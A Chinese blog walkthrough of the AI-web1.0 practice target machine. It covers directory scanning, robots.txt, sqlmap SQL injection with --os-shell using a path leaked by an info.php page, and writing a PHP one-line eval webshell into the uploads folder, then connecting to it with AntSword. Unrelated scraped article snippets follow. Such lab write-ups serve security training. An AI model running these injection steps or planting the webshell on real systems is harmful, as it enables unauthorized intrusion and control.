漏洞打靶AI-web1.0

      下载安装靶机后要进行靶机ip的确定,具体步骤可以查看我的上一篇博客,这里就不细说了。

在物理机访问靶机IP地址进入这样一个页面,我们发现这里没有输入框也没有点击按钮,导致我们无处下手,不过我们还可以用工具去扫描他的目录,去看看他还有没有其他级别的目录

      这里可以看到有一个robots.txt的文件,我们都知道这里放着的是爬虫禁止目录,直接去访问发现如下几个目录

      我们访问之后后发现两个目录都禁止访问,那么我们可以访问以下第二个目录的一级目录,然后就进入了一个提交id去获取信息的页面

      见到输入框,我们先开启抓包,输入一个1点击提交后将获取到的请求包放到sqlmap中去检测是否存在sql注入漏洞(这里记得在参数后面加一个*)

将数据包放到sqlmap根目录下一个的一个txt文件中,我这里是html.txt文件,然后到sqlmap中去进行注入,因为这里只有一个提交框,没法登陆,我们获取他数据库中的文件是没用处的,所以在这里,我们要进行--os-shell,去获取他的shell权限,但是这就需要他的绝对路经了。在robot.txt中我们得知了两个目录,在利用了第二个目录后,我们还可以利用工具查询一下第一个目录下是否还存在别的东西,这里我们又扫描出来他有一个info.php的文件,我们直接去访问得到一个探针文件的页面

      在这里就有网站根目录的路径,我们还需要找一个有生成文件权限的目录,而之前查到的uploads作为一个上传文件保存目录,它肯定有这个权限

      在sqlmap中输入如下语句,红框中的就是绝对路径

python3 sqlmap.py -r html.txt --os-shell

      然后就获得了shell权限,输入下面语句就可以在uploads目录中生成一个文件名为233.php的一句话木马

echo '<?php @eval($_POST['cmd']) ?>' >>/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/233.php

      访问该文件后发现成功访问

      用蚁剑去连也可以成功连接


http://www.ppmy.cn/server/93452.html

相关文章

8.1购物车

1.购物车模块 1.1查订单中可使用的优惠券 在执行确认订单业务时&#xff0c;用户可以选择优惠券。通过选择购物车的价格选择满足条件的优惠券 1.2查询用户购物车选中的商品 但是id都是一样的 使用起别名的方式 原因是 &#xff1b;因为字段名都是id 所以都映射到了第一个id…

效率控必点

大家好呀&#xff0c;今天我要来给大家安利几款我近期超爱的的效率提升神器&#xff01;每一款都是我亲自试用过&#xff0c;真的能让工作和生活都变得更加高效哦&#xff01;赶紧来看看&#xff0c;保证你用了也会爱上的&#xff01;&#x1f60d; 1️⃣ 【亿可达 】- 软件连…

react中使用Redux管理token以及token持久化

1.安装插件 npm i reduxjs/toolkit react-redux 2.新建状态管理文件 在src下新建store文件夹&#xff0c;store文件夹下新建模块文件夹(modules)和入口文件&#xff08;index.js&#xff09;&#xff0c;modules文件夹下新建setToken.js文件 3.配置setToken.js import { cr…

Spring Cloud全解析:注册中心之初识Eureka

Eureka简介 关于Eureka Eureka是springCloud在一开始的时候推荐使用的注册中心&#xff0c;是Netflix开源的服务发现组件 Eureka包含两个组件&#xff1a;Eureka Server和Eureka Client Eureka Server提供服务注册服务&#xff0c;各个节点启动后&#xff0c;会在EurekaSer…

使用Echarts来实现数据可视化

目录 一.什么是ECharts? 二.如何使用Springboot来从后端给Echarts返回响应的数据&#xff1f; eg:折线图&#xff1a; ①Controller层&#xff1a; ②service层&#xff1a; 一.什么是ECharts? ECharts是一款基于JavaScript的数据可视化图标库&#xff0c;提供直观&…

【TS】TypeScript类型断言:掌握类型转换的艺术

&#x1f308;个人主页: 鑫宝Code &#x1f525;热门专栏: 闲话杂谈&#xff5c; 炫酷HTML | JavaScript基础 ​&#x1f4ab;个人格言: "如无必要&#xff0c;勿增实体" 文章目录 TypeScript类型断言&#xff1a;掌握类型转换的艺术1. 引言2. 什么是类型断言&a…

金融居间crm客户系统-助力金融居间企业实现高效的客户关系管理

在当今瞬息万变的金融居间领域&#xff0c;金融居间企业若想在激烈的竞争中脱颖而出&#xff0c;实现高效的客户关系管理至关重要。而鑫鹿金融居间CRM 客户系统的出现&#xff0c;恰如一把利剑&#xff0c;为企业披荆斩棘&#xff0c;开辟出一条通向成功的道路。 金融居间CRM 客…

如何学习自动化测试工具!

要学习和掌握自动化测试工具的使用方法&#xff0c;可以按照以下步骤进行&#xff1a; 一、明确学习目标 首先&#xff0c;需要明确你想要学习哪种自动化测试工具。自动化测试工具种类繁多&#xff0c;包括但不限于Selenium、Appium、JMeter、Postman、Robot Framework等&…

7月31日学习笔记 基于域名,Ip,端口多虚拟主机配置以及上线商城系统

一&#xff0c;基于域名的虚拟主机 效果 劫持域名访问指定的文件夹的目录 步骤 1. vim /usr/local/nginx/conf/nginx.conf 2. 创建新的目录 mkdir /html/devopt/ 3. 在 devops 目录下添加新的 index.html 文件 4. 在 http 模块下添加新的 server 模块 1 . 设置监听的端…

用ai来修改优化代码

前言 使用AI来辅助编写或修改技术文档是一个高效的方法&#xff0c;特别是当涉及到大型文档或需要快速更新内容时。下面是如何使用AI来编写或修改一篇技术文档的步骤和示例。 步骤概述 明确文档目的&#xff1a;确定文档的目标读者和主要内容。准备现有材料&#xff1a;整理…

亚马逊新产品怎么快速提升销量

经常有卖家吐槽新产品没销量&#xff0c;但卖家们的吐槽并不能把问题解决&#xff0c;南哥和大家分享一下关于测评的好处和一些技巧&#xff0c;以及如何样做才能提高店铺销量&#xff0c;将运营和测评结合起来做 测评的好处: 提升店铺信誉&#xff0c;制造爆款&#xff0c;增…

Conda和pip在安装Python包时有什么区别?

Conda和pip都是Python包管理工具&#xff0c;但它们在安装Python包时有一些关键的区别&#xff1a; 1. 包管理方式 Conda&#xff1a;不仅可以安装Python包&#xff0c;还可以安装非Python程序和库&#xff0c;如NumPy、SciPy等&#xff0c;以及它们依赖的系统库。Conda通过环…

【人工智能】穿越科技迷雾:解锁人工智能、机器学习与深度学习的奥秘之旅

文章目录 前言一、人工智能1. 人工智能概述a.人工智能、机器学习和深度学习b.人工智能发展必备三要素c.小案例 2.人工智能发展历程a.人工智能的起源b.发展历程 3.人工智能的主要分支 二、机器学习1.机器学习工作流程a.什么是机器学习b.机器学习工作流程c.特征工程 2.机器学习算…

FLV流分析

与上一篇TS流分析-CSDN博客一样的&#xff0c;FLV流也是用于音视频合成&#xff0c;且用于音视频传输。 相比于TS流&#xff0c;FLV的封装更为简单&#xff0c;其分为文件头&#xff08;File Header&#xff09;、文件体&#xff08;File Body&#xff09; 下面分别介绍这几部…

PHP表单验证邮件和URL

在PHP中验证表单中的电子邮件地址和URL地址是确保用户输入数据正确性的重要步骤。下面是一个详细的教程&#xff0c;介绍如何使用PHP来验证电子邮件和URL地址。 一、验证电子邮件地址 电子邮件地址的验证通常涉及检查字符串是否符合电子邮件的标准格式。虽然完全通过正则表达…

【技术支持】canvas转换为图片或PDF保存电脑

注意&#xff1a;有些网站可能由于canvas跨域污染问题&#xff0c;无法使用toBlob&#xff0c;所以无法转换 开发者工具中&#xff0c;选中需要转换的canvas元素&#xff08;使其可以使用$0语法&#xff09; 控制台输入如下代码 $0.toBlob(function (blob) {var link document…

java类型转换

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 一、integer与String类型转换二、字符串转换为数组三、进制转换四、集合转数组集合转换为类型一致的数组数组转换为类型一致的集合 一、integer与String类型转换 方…

Python面试整理-自动化运维

在Python中,自动化运维是一个重要的应用领域。Python凭借其简单易用的语法和强大的库支持,成为了运维工程师的首选工具。以下是一些常见的自动化运维任务以及如何使用Python来实现这些任务: 1. 文件和目录操作 Python的os和shutil模块提供了丰富的文件和目录操作功能。 impo…

【课程系列07】某乎AI大模型全栈工程师-第7期

网盘链接 链接&#xff1a;百度网盘 请输入提取码 --来自百度网盘超级会员v6的分享 课程目标 学习完毕咱们可以收获什么种能力&#xff1a; 1、传统前端 后端 数据分析 产品 绘图 算法工程等工作&#xff0c;一个人都可以实现&#xff0c;实现超级个体的能力 2、可以解决…

【考研数学】概率论:4 种方法解答一道题,你觉得哪种方法又快又好呢?

今天要给大家分享的笔记是&#xff1a;《用画图的方式求解概率论题目很方便&#xff0c;但难点在于如何画和怎么理解》 在这篇考研笔记中&#xff0c;「荒原之梦考研数学」为同学们提供了 4 种不同的方法解答这一道题目&#xff0c;其中最特别的是第一种通过画图求解的方法。 …